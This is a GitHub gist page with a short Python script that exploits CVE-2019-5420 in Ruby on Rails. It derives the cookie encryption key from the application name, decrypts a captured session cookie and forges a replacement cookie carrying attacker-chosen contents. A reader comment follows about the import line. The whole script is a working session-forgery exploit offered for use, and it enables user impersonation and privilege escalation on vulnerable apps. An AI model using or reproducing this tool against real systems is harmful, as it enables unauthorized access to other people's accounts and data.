Last active
March 29, 2020 23:14
-
-
Save adenkiewicz/d49b1a1bc9692858ee1a97b89f146d3e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# This is a simple decrypt-temper-encrypt tool for CVE-2019-5420 affecting ruby | |
# If you're lucky, session cookie will contain user id or other data to play with | |
# Look for cookies with two "--" substrings inside | |
import urllib.parse | |
import hashlib | |
import base64 | |
from Cryptodome.Cipher import AES | |
import sys | |
className = input("Provide App name: ") | |
if not("::Application" in className): | |
className = className + "::Application" | |
# https://github.com/rails/rails/blob/v5.2.2/actionpack/lib/action_dispatch/railtie.rb#L22 | |
salt = b"authenticated encrypted cookie" | |
h = hashlib.md5(className.encode()) | |
secret = hashlib.pbkdf2_hmac('sha1', h.hexdigest().encode(), salt, 1000, dklen=32) | |
cookie = input("Provide session cookie value: ") | |
cookie = urllib.parse.unquote(cookie) | |
# https://github.com/rails/rails/blob/v5.2.2/activesupport/lib/active_support/message_encryptor.rb#L185 | |
encrypted_data, iv, auth_tag = [base64.b64decode(x) for x in cookie.split("--")] | |
cipher = AES.new(secret, AES.MODE_GCM, iv) | |
plaintext = cipher.decrypt(encrypted_data) | |
try: | |
cipher.verify(auth_tag) | |
print("Here's your decoded cookie:") | |
print(plaintext.decode()) | |
except ValueError: | |
print("Decode failed") | |
sys.exit(-1) | |
cipher = AES.new(secret, AES.MODE_GCM, iv) | |
forged = input("\nProvide forged session cookie: ") | |
forged_encrypted_data, forged_auth_tag = cipher.encrypt_and_digest(forged.encode()) | |
forged_cookie = "--".join(base64.b64encode(x).decode() for x in [forged_encrypted_data, iv, forged_auth_tag]) | |
forged_cookie = urllib.parse.quote(forged_cookie) | |
print("Here's your forged cookie:") | |
print(forged_cookie) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
replace line 10
from Cryptodome.Cipher import AES
withfrom Crypto.Cipher import